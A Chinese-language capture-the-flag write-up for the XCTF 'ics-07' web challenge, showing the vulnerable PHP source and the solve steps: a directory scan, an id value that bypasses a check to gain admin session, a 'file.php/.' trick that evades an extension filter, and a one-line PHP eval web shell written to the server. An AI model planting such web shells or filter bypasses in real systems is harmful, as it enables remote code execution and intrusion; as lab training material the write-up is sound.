2. 程式人生 > 實用技巧 >【XCTF 4th-CyberEarth】ics-07

【XCTF 4th-CyberEarth】ics-07

阿新 發佈:2020-07-12

資訊:

題目來源:XCTF 4th-CyberEarth

標籤:PHP原始碼洩露SSRF反序列化SQL

題目描述:工控雲管理系統專案管理頁面解析漏洞

解題過程

進入網站後,首先進行目錄掃描:

[TIME] 			=> 2020-07-08 15:34:39.931717
[TARGET] 			=> http://220.249.52.133:54884/
[NUMBER_OF_THRED] 	=> 10
[KEY_WORDS] 		=> ['flag', 'ctf', 'admin']

[302] => index.php
[200] => flag.php
[200] => config.php
[200] => /config.php
[200] => index.html

得到以上檔案資訊,發現名為專案管理中心的頁面:

發現網頁原始碼(第一部分):

<?php
session_start();

if (!isset($_GET[page])) {
    show_source(__FILE__);
    die();
}

if (isset($_GET[page]) && $_GET[page] != 'index.php') {
	include('flag.php');
}else {
	header('Location: ?page=flag.php');
}
?>

本部分程式碼無需特殊處理。

第二部分:

<?php
if ($_SESSION['admin']) {
    $con = $_POST['con'];
    $file = $_POST['file'];
    $filename = "backup/".$file;

    if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
        die("Bad file extension");
    }else{
        chdir('uploaded');
        $f = fopen($filename, 'w');
        fwrite($f, $con);
        fclose($f);
    }
}
?>

這部分程式碼首先需要滿足$_SESSION['admin'] == True才行。

當滿足上述條件時,可以使用post上傳檔案,要求檔案字尾名不能為:php、php3、php4、php5、php7、pht、phtml。

第三部分:

<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
	include 'config.php';
    $id = mysql_real_escape_string($_GET[id]);
    $sql="select * from cetc007.user where id='$id'";
    $result = mysql_query($sql);
    $result = mysql_fetch_object($result);
} else {
    $result = False;
    die();
}

if(!$result)die("<br >something wae wrong ! <br>");
if($result){
    echo "id: ".$result->id."</br>";
    echo "name:".$result->user."</br>";
    $_SESSION['admin'] = True;
}
?>

這部分程式碼需要滿足:

  1. 存在id ≠ (int)1
  2. id的最後一位 = 9

滿足這兩個條件時:$_SESSION['admin'] = True;

構造payload:http://ip/index.php?page=flag.php&id=1a9

這時,可以使用post方式上傳檔案,file為檔名,con為檔案內容。

正則的話是判斷.之後的字元,因此我們可以利用/.的方式繞過,這個方式的意思是在檔名目錄下在加個空目錄,相當於沒加,因此達到繞過正則的目的。

file=backdoor.php/.&con=<?php @eval($_POST['123']);?>

使用菜刀類工具連線,得到flag

相關推薦

XCTF 4th-CyberEarthics-07

資訊: 題目來源:XCTF 4th-CyberEarth 標籤:PHP、原始碼洩露、SSRF、反序列化、SQL

2020.07.15NOIP提高組模擬

2020.07.15比賽總結 最大配對 題目大意:給出\\(2\\)個序列\\(A={a[1],a[2],…,a[n]},B={b[1],b[2],…,b[n]}\\),從\\(A、B\\)中各選出k個元素進行一一配對(可以不按照原來在序列中的順序),並使得所有配對

interview2020.07.24 谷歌不相容的 setImmediate、如何通過路由找到路由元件的、思考 axios 分析 Promise 封裝 ajax

一、谷歌不相容的window.setImmediate() 在 MDN 上看window.setImmediate() 描述 該方法可能不會被批准成為標準,目前只有最新版本的 Internet Explorer 和Node.js 0.10+實現了該方法。

interview2020.07.21 map、set 資料結構、cookie封裝、首屏優化方案、定時器延時器、vue路由鉤子、calc

一、css3 新增:使用calc()計算寬高(vw/vh) 簡單來說就是CSS3中新增的一個函式,calculate(計算)的縮寫。

2020-07-27一次面試,記錄一些簡單的java面試題目網上摘錄解析

1 簡單介紹一下ssm吧? SSM框架,是Spring + Spring MVC + MyBatis的縮寫,目前主流的Java EE企業級框架,適用於搭建各種大型的企業級應用系統。使用ssm框架的好處是在於其易複用和簡化開發,掌握了每個框架的核心思

Spring Data JPA07 Specifications動態查詢

前言說明 針對CRUD種的查詢,因為我們的查詢總是具有各種各樣的篩選條件

SQLite教程07-C/C++上使用SQLite3

1、配置好C/C++專案環境 2.開啟、建立資料庫 1 #include <iostream> 2 #include <vector>

紀中暑假集訓 2020.08.07NOIP提高組模擬 T1:佛山市選2013迴文子序列

佛山市選2013迴文子序列 Description 迴文序列是指左右對稱的序列。例如1 2 3 2 1是迴文序列,但是1 2 3 2 2就不是。我們會給定一個N×M的矩陣,你需要從這個矩陣中找出一個P×P的子矩陣,使得這個子矩陣的每一列

紀中暑假集訓 2020.08.07NOIP提高組模擬 T2:佛山市選2013樹環轉換

佛山市選2013樹環轉換 Description 給定一棵N個節點的樹,去掉這棵樹的一條邊需要消耗值1,為這個圖的兩個點加上一條邊也需要消耗值1。樹的節點編號從1開始。在這個問題中,你需要使用最小的消耗值(加邊和刪邊操

紀中暑假集訓 2020.08.07NOIP提高組模擬 T3:佛山市選2013海明距離

佛山市選2013海明距離 Description 對於二進位制串a,b,他們之間的海明距離是指兩個串異或之後串中1的個數。異或的規則為:

劍指offer07 斐波那契數列

題目地址:斐波那契數列 題目描述 大家都知道斐波那契數列,現在要求輸入一個整數n,請你輸出斐波那契數列的第n項(從0開始,第0項為0,第1項是1)。

不要充錢!狠狠的白瓢狗卡!不氪指南三國殺十週年4.01-4.07

本精策出自,新三國殺 無產大家庭(群號:304140031) (氪金等級劃分詳情在群檔案→精策入門→階級劃分表,有需要自取。)

Java學習筆記基礎篇07.JavaDoc

JavaDoc 1.介紹 JavaDoc是一種將註釋生成HTML文件的技術,生成的HTML文件類似於Java的API,易讀且清晰明瞭。

BSP視訊教程STM32H7視訊教程第12期:NVIC中斷管理和優先順序動態分配,實戰分享減小開關中斷對實時性影響,提升系統響應速度(2022-04-07)

視訊教程彙總帖:https://www.armbbs.cn/forum.php?mod=viewthread&tid=110519   本期視訊教程為大家分享BSP驅動教程第12期

iOS面試糧食UI檢視—iOS事件的傳遞機制

本文章將記錄有關 iOS事件的傳遞機制,如有錯誤歡迎指出~ iOS的事件分為3大型別

九圖流從零開始設計一個登入系統(初中級)

說明: 無任何程式碼,只有設計思路。 範疇等級:初級開發、中級開發。 場景:中小型專案,內部專案。

透過面試題掌握Redis持續更新中

最近是把《Redis設計與實現》看完了,然後也對每一章寫了讀書筆記。但是總感覺自己掌握得不夠,所以就在網上搜集了一些Redis相關的面試題,然後自己去翻筆記,看書,查資料嘗試著去解答,目前這篇文章還沒有完全覆蓋

iOS面試糧食OC語言—Category(分類)和類擴充套件(extension)、關聯物件

本文章將記錄有關 Category(分類)和類擴充套件(extension)、關聯物件的特性,如有錯誤歡迎指出~

SpringBoot-In-Action一、Spring Boot快速入門

本系列教程根據本人實際學習使用 SpringBoot2.x 過程總結整理而來。 1、Spring Boot 簡介

iOS面試糧食OC語言—KVC、KVO

本文章將記錄有關 KVC、KVO的特性,如有錯誤歡迎指出~ KVC(Key-Value Coding)鍵值編碼